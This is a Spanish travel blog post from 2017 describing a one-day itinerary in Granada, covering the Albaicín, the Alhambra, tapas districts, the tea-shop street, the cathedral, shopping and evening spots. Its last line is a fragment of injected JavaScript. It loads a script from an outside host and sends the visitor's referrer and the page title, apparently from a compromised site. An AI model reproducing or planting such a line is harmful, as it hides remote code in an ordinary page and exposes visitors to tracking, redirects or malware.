Granada: la ciudad más bonita de España en 24 horas

09/01/2017

Granada-EspañaGranada, la ciudad más bonita de España. Así ha sido elegida por Sitios de España y es casi con toda seguridad, una de esas ciudades que tienes en tu lista de lugares a visitar. Gran parte de la historia de España está adosada a los muros de sus emblemáticos edificios o empedradas calles. Pero seamos sinceros… Decir que Granada es una fuente transmisora de sentimientos y exóticos olores heredados de la cultura musulmana, ya lo sabemos, también podemos afirmar que ir de tapas mezclándonos entre todos esos risueños universitarios que inundan los pequeños y céntricos bares, es toda una experiencia, hasta el flamenco que se desprende de las cuevas del sepulcro, es puro arte.

Sin embargo, lo que realmente deseas conocer, es dónde ir o qué hacer en Granada , y así poder estrujar esas 24 horas que tienes de límite en esta bella ciudad.

Empezaremos el día visitando el pintoresco barrio del Albaicín, donde tomaremos un desayuno repleto de energía en el conocido Café 4 Gatos, (Placeta Cruz Verde, 6). Sus tostadas aquí son famosas por su tamaño y pueden ser combinadas con excelentes mermeladas caseras, ( aunque a mí la que más me gusta, es la tostada de tomate, aceite y sal, junto a un estupendo café calentito).

10665_fill_1024_0La siguiente parada de nuestro excitante recorrido, es al monumento arquitectónico más visitado de España, la Alhambra de Granada (recordad comprar online el ticket, con bastante antelación). Ha sido testigo de feroces batallas, arriesgadas conquistas e importantes rehabilitaciones, hasta convertirse en un complejo arquitectónico de gran valor. Sus muros están cobijados por un entorno de cuento, repleto de colores, frondosos bosques y espacios de gran belleza como el Palacio de Muhammad V, la Sala de los Mozárabes, el Mirador de Daraxa o Los Jardines del Generalife. La Alhambra de Granada fue declarada patrimonio de la humanidad en 1994.

¿Tienes un poco de hambre? Vamos aprovechar para disfrutar de las famosas tapas de Granada, si hay algo que caracteriza a esta ciudad, es esa generosa tapa que siempre llega cuando pedimos una bebida. Las mejores zonas para descubrir esta tradición son la Chana, (ideal por sus terrazas exteriores), el Realejo (Campo del Príncipe), el barrio del Zaidín o la Calle San Matías.

Vamos a bajar esas tapas con una tranquila caminata por ese pasado exótico nazarí repleto
de contrastes hasta llegar a la zona de las teterías de calle Calderería Nueva, más conocida como la calle de las Teterías. Su peculiar atmósfera tiene la capacidad de transportarnos directamente al mismísimo Marruecos, pero mucho más cómodo y barato. Vuelve sobre tus pasos hacia otro lugar que deberías visitar, la Catedral de Granada, todo un símbolo de la arquitectura española, cuya capilla mayor es sencillamente impresionante.

Saliendo de la catedral, en calle Cárcel Baja, existe un rincón muy peculiar donde podéis encontrar ese regalo ideal para tu amigo “el cocinillas”, un puesto de especias repleto de aromas embriagadores. Por el contrario si buscas tiendas de moda, puedes recorrer Reyes Católicos hasta Plaza del Carmen, incluyendo sus paralelas, donde se concentran algunas de las mejores de la ciudad. Debéis saber que Granada, es perfecta para comprar  productos artesanales como el cuero, antigüedades, mantillas, cerámicas, guitarras, orfebrería, etc.

El día se está acabando y no puedes irte sin despedirte de Granada como es debido, sin palabras os quedaréis con la puesta de sol más bella del mundo , que disfrutarás desde el Mirador de San Nicolás (con permiso de Ibiza y Cádiz).

Si tenéis ganas de cenar os recomiendo el Restaurante Carmen del Agua, (Placeta del Aljibe de Trillo, 7), su especialidades son las fondues de queso, pero os cuento un secreto, la de chocolate es un pecado. Intentar reservar una mesa con vistas, nunca se os olvidará. Y si os quedáis con ganas de marcha y quieres comprobar que la ciudad no duerme, qué tal una copita en el Camborio, a 1 km del restaurante. Puede ser la discoteca mejor ubicada del mundo, su exterior es una maravilla y sus cuevas se llenan de vida, diversión y mucha música.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;